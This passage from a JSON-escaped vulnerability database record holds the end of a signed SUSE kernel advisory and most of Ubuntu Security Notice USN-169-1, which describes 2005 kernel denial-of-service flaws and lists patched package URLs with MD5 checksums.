http://www.gnupg.org\r\n\r\n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\r\nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=\r\n=LRKC\r\n- -----END PGP PUBLIC KEY BLOCK-----\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2 (GNU/Linux)\r\n\r\niQEVAwUBQxcQmHey5gA9JdPZAQKEJwf9HJ48ccSkW6zu7vkhuyC95yGHJJDTHhSo\r\nV3MQnpQJQXFDOOs0CzlQmWhDWrgji1OdSAkbUYgrnD8PpXR/ci+kVksNGjp9ZWqL\r\nmqF27aglz/00jmknS+NqfLyFK6KD0tnA6XC0246yZJwGUqv8p2adYkdtwvLj5UtK\r\nlTyLm1lFmygwFy6Yj5ZzQ+P2VE3PWNFF4wi9P+rzaBbLU2qErqNqlL2OznmgP/ON\r\nVhWqqeCfs7EoLburpzMlMbr6hwmJ0T7P6oLto9Jx77helRUjv+gPigtruQkO6o9x\r\nbSbFp/viKkzhoWk653o0EWYPlI81L5E9ZvzTs3hVmTMFlONiPmONJw==\r\n=UDS2\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2005-09-02T00:00:00", "published": "2005-09-02T00:00:00", "id": "SECURITYVULNS:DOC:9632", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9632", "title": "SUSE Security Announcement: kernel multiple security problems (SUSE-SA:2005:050)", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-2457", "CVE-2005-2099", "CVE-2005-2548", "CVE-2005-2098", "CVE-2005-2459", "CVE-2005-2456", "CVE-2005-2458", "CVE-2005-2555"], "description": "===========================================================\r\nUbuntu Security Notice USN-169-1 August 19, 2005\r\nlinux-source-2.6.8.1, linux-source-2.6.10 vulnerabilities\r\nCAN-2005-2098, CAN-2005-2456, CAN-2005-2457, CAN-2005-2458,\r\nCAN-2005-2459, CAN-2005-2548, CAN-2005-2555\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 4.10 (Warty Warthog)\r\nUbuntu 5.04 (Hoary Hedgehog)\r\n\r\nThe following packages are affected:\r\n\r\nlinux-image-2.6.10-5-386\r\nlinux-image-2.6.10-5-686\r\nlinux-image-2.6.10-5-686-smp\r\nlinux-image-2.6.10-5-amd64-generic\r\nlinux-image-2.6.10-5-amd64-k8\r\nlinux-image-2.6.10-5-amd64-k8-smp\r\nlinux-image-2.6.10-5-amd64-xeon\r\nlinux-image-2.6.10-5-itanium\r\nlinux-image-2.6.10-5-itanium-smp\r\nlinux-image-2.6.10-5-k7\r\nlinux-image-2.6.10-5-k7-smp\r\nlinux-image-2.6.10-5-mckinley\r\nlinux-image-2.6.10-5-mckinley-smp\r\nlinux-image-2.6.10-5-power3\r\nlinux-image-2.6.10-5-power3-smp\r\nlinux-image-2.6.10-5-power4\r\nlinux-image-2.6.10-5-power4-smp\r\nlinux-image-2.6.10-5-powerpc\r\nlinux-image-2.6.10-5-powerpc-smp\r\nlinux-image-2.6.8.1-5-386\r\nlinux-image-2.6.8.1-5-686\r\nlinux-image-2.6.8.1-5-686-smp\r\nlinux-image-2.6.8.1-5-amd64-generic\r\nlinux-image-2.6.8.1-5-amd64-k8\r\nlinux-image-2.6.8.1-5-amd64-k8-smp\r\nlinux-image-2.6.8.1-5-amd64-xeon\r\nlinux-image-2.6.8.1-5-k7\r\nlinux-image-2.6.8.1-5-k7-smp\r\nlinux-image-2.6.8.1-5-power3\r\nlinux-image-2.6.8.1-5-power3-smp\r\nlinux-image-2.6.8.1-5-power4\r\nlinux-image-2.6.8.1-5-power4-smp\r\nlinux-image-2.6.8.1-5-powerpc\r\nlinux-image-2.6.8.1-5-powerpc-smp\r\nlinux-patch-debian-2.6.8.1\r\nlinux-patch-ubuntu-2.6.10\r\n\r\nThe problem can be corrected by upgrading the affected package to\r\nversion 2.6.8.1-16.21 (for Ubuntu 4.10), or 2.6.10-34.4 (for Ubuntu\r\n5.04). You need to reboot your computer after a standard system\r\nupgrade to effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nDavid Howells discovered a local Denial of Service vulnerability in\r\nthe key session joining function. Under certain user-triggerable\r\nconditions, a semaphore was not released properly, which caused\r\nprocesses which also attempted to join a key session to hang forever.\r\nThis only affects Ubuntu 5.04 (Hoary Hedgehog). (CAN-2005-2098)\r\n\r\nDavid Howells discovered a local Denial of Service vulnerability in\r\nthe keyring allocator. A local attacker could exploit this to crash\r\nthe kernel by attempting to add a specially crafted invalid keyring.\r\nThis only affects Ubuntu 5.04 (Hoary Hedgehog). (CAN-2005-2099)\r\n\r\nBalazs Scheidler discovered a local Denial of Service vulnerability in\r\nthe xfrm_compile_policy() function. By calling setsockopt() with an\r\ninvalid xfrm_user policy message, a local attacker could cause the\r\nkernel to write to an array beyond its boundaries, thus causing a\r\nkernel crash. (CAN-2005-2456)\r\n\r\nTim Yamin discovered that the driver for compressed ISO file systems\r\ndid not sufficiently validate the iput data. By tricking an user into\r\nmounting a malicious CD-ROM with a specially crafted compressed ISO\r\nfile system, he could cause a kernel crash. (CAN-2005-2457)\r\n\r\nIt was discovered that the kernel's embedded zlib compression library\r\nwas still vulnerable to two old vulnerabilities of the standalone zlib\r\nlibrary. This library is used by various drivers and can also be used\r\nby third party modules, so the impact varies. (CAN-2005-2458,\r\nCAN-2005-2459)\r\n\r\nPeter Sandstrom discovered a remote Denial of Service vulnerability in\r\nthe SNMP handler. Certain UDP packages lead to a function call with\r\nthe wrong argument, which resulted in a crash of the network stack.\r\nThis only affects Ubuntu 4.10 (Warty Warthog). (CAN-2005-2548)\r\n\r\nHerbert Xu discovered that the setsockopt() function was not\r\nrestricted to privileged users. This allowed a local attacker to\r\nbypass intended IPSec policies, set invalid policies to exploit flaws\r\nlike CAN-2005-2456, or cause a Denial of Service by adding policies\r\nuntil kernel memory is exhausted. Now the call is restricted to\r\nprocesses with the CAP_NET_ADMIN capability. (CAN-2005-2555)\r\n\r\nThe Ubuntu 5.04 kernel update also fixes a memory leak in the "md"\r\n(Software RAID) driver which eventually lead to kernel memory\r\nexhaustion. Ubuntu 4.10 is not affected by this.\r\n(http://bugs.debian.org/317787)\r\n\r\n\r\nUpdated packages for Ubuntu 4.10 (Warty Warthog):\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-source-2.6.8.1_2.6.8.1-16.21.diff.gz\r\n Size/MD5: 3150931 2592465ee5409ee070b46abb6db208af\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-source-2.6.8.1_2.6.8.1-16.21.dsc\r\n Size/MD5: 2121 5e1cd652e18a353051f396fd957609b7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-source-2.6.8.1_2.6.8.1.orig.tar.gz\r\n Size/MD5: 44728688 79730a3ad4773ba65fab65515369df84\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-doc-2.6.8.1_2.6.8.1-16.21_all.deb\r\n Size/MD5: 6158086 19d0ccdfd79bb49c64ed07e774147999\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-patch-debian-2.6.8.1_2.6.8.1-16.21_all.deb\r\n Size/MD5: 1508724 c6639ae2c9c8161dc2e59d453800cade\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-source-2.6.8.1_2.6.8.1-16.21_all.deb\r\n Size/MD5: 36728390 76dd7c90e34a64853216ab57cb7f4fe0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-tree-2.6.8.1_2.6.8.1-16.21_all.deb\r\n Size/MD5: 309334 192494d605d7f907e4f5abb00de3fc18\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-amd64-generic_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 248804 8d55088ad0277c7942b04905844c83c0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-amd64-k8-smp_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 244778 90b37eb9698a1d496816a0cda72bd137\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-amd64-k8_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 247606 f4f80b507d21fa332a894978a1f74bc1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-amd64-xeon_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 243122 fa6e460907d3817c24fb63547fceefe7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 3180438 c294a14b798342743402ca97eb69cff8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-amd64-generic_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 14352022 9b40c909eb2fef2ca09e717df04e6b30\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-amd64-k8-smp_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 14829664 3e22c0fb4f2a444f68eefd54c19dd801\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-amd64-k8_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 14863718 a18e2860b05488856124ec57b84a30c3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-amd64-xeon_2.6.8.1-16.21_amd64.deb\r\n Size/MD5: 14686614 8a829015c2efc262e42374f66df802e8\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-386_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 278044 0f0ed87c28d52e92ad44ca227a53fef9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-686-smp_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 273130 89a4ecfae04b6bffff940e3ad38b2f09\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-686_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 275992 4ed3c0fa3502b95ce3b3e1165966c502\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-k7-smp_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 273640 b8746918e52e2f63a95a6f0d156df9fd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-k7_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 276132 c3f93f3f3d34cda6c4642f7828381fd3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 3221238 797d734bbe4152e282bd322aa0c28773\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-386_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 15497320 334177b31b3603f129c37bea25d45d77\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-686-smp_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 16346430 4f2bf6270d71b0695de4eeed90882809\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-686_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 16517780 ca57bc5ec9618654f5926111b4444ffb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-k7-smp_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 16450172 80d7d11389a98fb376a6484c4b563e5c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-k7_2.6.8.1-16.21_i386.deb\r\n Size/MD5: 16575230 c0fece845baa30df4a910964fb7dcb31\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-power3-smp_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 213492 20a0fca0ad9b88e5cb482d6d5e6f40fc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-power3_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 214526 0798b1a32577dfb2adddb4da11a730f5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-power4-smp_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 213220 d3e9b0acad728a9a278bf58f1e752f22\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-power4_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 214070 422c9839d9fab9b040582abbaeb9a17f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-powerpc-smp_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 213918 19346de3802f2f8e7f7fcf3fca4f57fc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5-powerpc_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 216150 be02cbae0671d073f6ab69622646a44e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-headers-2.6.8.1-5_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 3298218 9148211f6f8c3d54c12510b412befd59\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-power3-smp_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 16370308 5617bd877f1b0d04ea3b751832ea35b1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-power3_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 15942120 6aa761fd924ebc01eb41678d3eb0a6b4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-power4-smp_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 16356246 6ba5b3b0d32f02fdcacd5c3ce454599e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-power4_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 15932268 fb678da934f0b16df49b1aef97f90051\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-powerpc-smp_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 16292410 af41ad03cf3e13f964ff4007b22f6c5f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.8.1/linux-image-2.6.8.1-5-powerpc_2.6.8.1-16.21_powerpc.deb\r\n Size/MD5: 15975292 03d379b33553b12b194c81039d91f7db\r\n\r\nUpdated packages for Ubuntu 5.04 (Hoary Hedgehog):\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-source-2.6.10_2.6.10-34.4.diff.gz\r\n Size/MD5: 6041200 4564aed5352b2e3cb8f172a30887ddb1\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-source-2.6.10_2.6.10-34.4.dsc\r\n Size/MD5: 2645 7c9af2cf3df003eb9cb19f5ee77644e0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-source-2.6.10_2.6.10.orig.tar.gz\r\n Size/MD5: 46244465 063a64fc0efd9c9901cf07effef1b747\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-doc-2.6.10_2.6.10-34.4_all.deb\r\n Size/MD5: 6780284 4d2dec8b6e6baa5d6e1b90474ee05d91\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-source-2.6.10_2.6.10-34.4_all.deb\r\n Size/MD5: 37514478 50bf50110a60cd13608dd637c2de57ba\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-tree-2.6.10_2.6.10-34.4_all.deb\r\n Size/MD5: 503476 c66c0ea8a91f5b112af362dc3df5757b\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/acpi-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 20828 6a28d2ade25817cc3e2368cb719f7f09\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/cdrom-core-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 47396 390b9278ebb802e2c897fb15615cb911\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext3-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 88892 e2ae6bba29eb561f3cdd68c751a3e15a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fat-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 30020 e49ef4804d666ab23070faf6c706cce1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fb-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 41234 3cd553baef921c73dab913686387e2bb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firewire-core-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 73592 805e5d067c63e70ecd27e326df87b6c2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firmware-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 5742 ad6fbed07a117d3ab55a100cc45857b7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/floppy-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 34852 3e4f9b315b1f2ec558af3d11adfb30df\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ide-core-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 55184 f8d462a04508347ed9e5b7fe04575874\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ide-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 112972 16352097c826664188af0f3e7c548edc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/input-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 40806 88b025dbe3a6ef3ff196b953372cfe91\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ipv6-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 115734 de38182b39528c3cff753aef83fa4282\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/irda-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 174628 7951046302e24ff2a804ba096c083884\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/jfs-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 82592 1e013fe88ab7a92dc29ef97ba3d5a8fb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/kernel-image-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 1465770 f5270288a221e150b59ca767e664640c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-amd64-generic_2.6.10-34.4_amd64.deb\r\n Size/MD5: 285430 f1167642c6061177e41fe5a216a1eef5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-amd64-k8-smp_2.6.10-34.4_amd64.deb\r\n Size/MD5: 282344 ce210d40b0366ea80d0ebbdb022d3faa\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-amd64-k8_2.6.10-34.4_amd64.deb\r\n Size/MD5: 284322 